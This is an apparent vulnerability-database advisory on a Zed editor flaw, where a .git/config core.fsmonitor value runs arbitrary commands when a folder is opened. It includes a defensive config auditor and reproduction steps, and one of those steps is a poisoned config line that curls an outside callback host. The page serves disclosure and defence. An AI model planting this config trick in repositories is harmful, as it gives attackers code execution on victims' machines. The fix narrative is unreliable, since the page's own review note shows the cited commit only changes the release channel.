VYPR
High severity (8.6) · NVD Advisory · Published May 28, 2026 · Updated May 28, 2026

CVE-2026-44465

Description

Zed is a code editor. Prior to 0.227.1, Zed IDE executes arbitrary commands when opening a folder with a malicious .git/config file that abuses the core.fsmonitor Git configuration option. This allows an attacker to achieve Remote Code Execution (RCE) when a victim opens a folder in untrusted mode. This vulnerability is fixed in 0.227.1.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Zed IDE before 0.227.1 executes arbitrary commands when opening a folder with a malicious .git/config file abusing core.fsmonitor, enabling RCE.

Vulnerability

Zed IDE versions prior to 0.227.1 are vulnerable to arbitrary command execution when a user opens a folder containing a malicious .git/config file. The vulnerability lies in the way Zed invokes Git operations in untrusted mode: it respects the repository-local Git configuration, including the core.fsmonitor option, which names a command for Git to execute. Zed does not sanitize or restrict this configuration value before running Git commands, so an attacker can inject arbitrary shell commands. The attack requires that the victim opens the folder in Zed's untrusted mode. Affected versions include all releases before 0.227.1, with testing confirmed on the latest stable release and the v0.223.3 preview [1].

Exploitation

An attacker crafts a Git repository with a malicious .git/config file containing a core.fsmonitor directive set to an arbitrary command (e.g., a curl callback to an attacker-controlled server). The attacker then distributes this repository to the victim via Git hosting platforms, shared drives, or archives. When the victim opens the folder in Zed IDE, Zed performs Git operations that trigger the execution of the fsmonitor command. No additional user interaction beyond opening the folder is required; the vulnerability is triggered automatically [1]. Proof-of-concept steps include initializing a Git repository, editing .git/config to include the malicious fsmonitor value, and opening the folder in Zed [1].

Impact

Successful exploitation allows arbitrary code execution with the privileges of the user running Zed. The attacker can execute any shell command, such as establishing a reverse shell, exfiltrating data, or deploying malware. This results in full compromise of the victim's system. The attack vector is highly effective because it requires no authentication, network position manipulation, or user interaction beyond opening the project folder. The vulnerability is classified as high severity, with a CVSS v3 score of 8.6 [1].

Mitigation

The vulnerability is fixed in Zed version 0.227.1, released on the same date as the advisory (2026-05-28) [1]. Users should immediately update to this version or later. There are no known workarounds for unpatched versions; the only mitigation is to avoid opening untrusted folders in Zed until the update is applied. The vulnerability is not currently listed in CISA's Known Exploited Vulnerabilities (KEV) catalog as of the publication date.
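Because the mitigation for unpatched versions comes down to not opening untrusted folders, a defender can at least audit a folder's repository-local config before opening it. The following is an added example (not code from the advisory, from Zed, or from Git): it parses .git/config and flags core.fsmonitor together with a few other keys that make git execute a program or load scripts from the repository. The key list, the filter pattern and the sample config are the editor's assumptions, and the parser does not interpret escape sequences inside quoted values.

```python
import re
from pathlib import Path

# Repo-local keys that make git run an external program or point it at scripts in the
# repo. Editor's non-exhaustive list, not from the advisory; core.fsmonitor is the CVE key.
COMMAND_KEYS = {"core.fsmonitor", "core.sshcommand", "core.gitproxy",
                "core.hookspath", "core.pager", "diff.external", "credential.helper"}
FILTER_KEY = re.compile(r"^filter\.[^.]+\.(clean|smudge|process)$")
_SECTION = re.compile(r'^\[\s*([^\s"\]]+)(?:\s+"([^"]*)")?\s*\]$')
_KEYVAL = re.compile(r"^([A-Za-z][A-Za-z0-9-]*)\s*(?:=\s*(.*))?$")

def parse_git_config(text: str) -> dict[str, str]:
    """Parse git's INI-like config into {"section[.subsection].key": value}; escapes are not interpreted."""
    entries, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if m := _SECTION.match(line):
            section = m.group(1).lower() + (f".{m.group(2)}" if m.group(2) is not None else "")
            continue
        if section is None or not (m := _KEYVAL.match(line)):
            continue
        value = (m.group(2) or "true").strip()  # a bare key means boolean true
        if value.startswith('"'):
            end = value.find('"', 1)
            value = value[1:end] if end > 0 else value[1:]
        else:  # unquoted value: drop a trailing comment
            value = re.split(r"\s*[#;]", value, maxsplit=1)[0].strip()
        entries[f"{section}.{m.group(1).lower()}"] = value
    return entries

def find_command_keys(entries: dict[str, str]) -> list[tuple[str, str]]:
    """Return the (key, value) pairs that would make git execute something."""
    return [(k, v) for k, v in entries.items() if k in COMMAND_KEYS or FILTER_KEY.match(k)]

def audit_folder(folder: str) -> list[tuple[str, str]]:
    """Audit <folder>/.git/config before the folder is opened in an editor."""
    cfg = Path(folder) / ".git" / "config"
    if not cfg.is_file():
        return []
    return find_command_keys(parse_git_config(cfg.read_text(errors="replace")))

# Constructed sample in the shape the advisory describes, with a harmless placeholder value.
SAMPLE_CONFIG = """\
[core]
\tfsmonitor = "/tmp/not-a-real-monitor --callback" ; constructed, runs nothing here
[filter "lfs"]
\tclean = git-lfs clean -- %f
"""
```

Run audit_folder() on a freshly cloned or extracted folder and treat any hit as a reason to inspect the config by hand; expect legitimate hits such as filter.lfs.clean when Git LFS is configured locally.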

AI Insight generated on May 28, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products (2)

  • Zed Industries / Zed (inferred), 2 version ranges: <0.227.1 (+1 more)
    • (no CPE) range: <0.227.1
    • (no CPE) range: <0.227.1

Patches (1)

Commit 9f9b707d39d6 (v0.227.x stable)

Repository: https://github.com/zed-industries/zed · Author: Joseph T. Lyons · Mar 11, 2026 · Fixed in 0.227.1 (via release-tag)
1 file changed · +1 −1
  • crates/zed/RELEASE_CHANNEL (+1 −1, modified)
    @@ -1 +1 @@
    -preview
    \ No newline at end of file
    +stable
    \ No newline at end of file
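Review bot: the only change in this hunk is crates/zed/RELEASE_CHANNEL flipping from preview to stable, so commit 9f9b707d39d6 is a release-channel bump, not the code change that stops Zed from honoring core.fsmonitor from a repository-local .git/config; the "What the fix does" narrative below should not describe this commit as the fix itself, and the record would be more useful if it linked the commit that actually changes how Zed runs git for untrusted folders. The missing trailing newline on both sides is pre-existing and harmless for a one-line channel marker.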
    

Vulnerability mechanics

Root cause

"Zed does not sanitize or restrict the core.fsmonitor Git configuration option before running Git commands, allowing a malicious .git/config file to specify an arbitrary shell command that Git executes."

Attack vector

An attacker creates a Git repository with a poisoned .git/config file that sets core.fsmonitor to a malicious command (e.g., a curl callback or reverse shell) [ref_id=1]. When a victim opens this folder in Zed IDE (even in untrusted mode), Zed invokes Git operations that respect the repository-local configuration, causing Git to execute the attacker-controlled fsmonitor command [ref_id=1]. The attack requires no additional interaction beyond opening the project folder, and the command runs with the victim's user privileges [ref_id=1]. The attacker can distribute the poisoned repository via Git hosting platforms, shared drives, or archives [ref_id=1].

Affected code

The advisory does not specify exact file paths or functions. The vulnerability lies in how Zed invokes Git operations on a repository without sanitizing the repository-local .git/config file, specifically the core.fsmonitor option [ref_id=1]. The patch is identified by commit 9f9b707d39d62468d4cdaed2d8eb95a847da4cf9 [patch_id=2961923].

What the fix does

The patch in commit 9f9b707d39d62468d4cdaed2d8eb95a847da4cf9 [patch_id=2961923] addresses the vulnerability by ensuring Zed does not honor the core.fsmonitor configuration from untrusted repositories. The advisory states the fix is included in version 0.227.1 [ref_id=1]. No further details about the specific code change are available from the supplied bundle beyond the commit hash and version.

Preconditions

  • input: Victim must open a folder containing a malicious .git/config file with a crafted core.fsmonitor value.
  • auth: No authentication required; the attack works in untrusted mode.
  • network: No network precondition; the payload can be local or reach outbound (e.g., curl to webhook.site).

Reproduction

1. Create a folder with a poisoned .git/config: `mkdir /tmp/evil-repo && cd /tmp/evil-repo && git init` [ref_id=1].
2. Edit .git/config to include: `[core] fsmonitor = "curl https://webhook.site/<your-id>/zed/git/config"` [ref_id=1].
3. Open the folder in Zed IDE [ref_id=1].
4. Observe the callback on webhook.site confirming arbitrary command execution [ref_id=1].

Generated on May 28, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References (1)
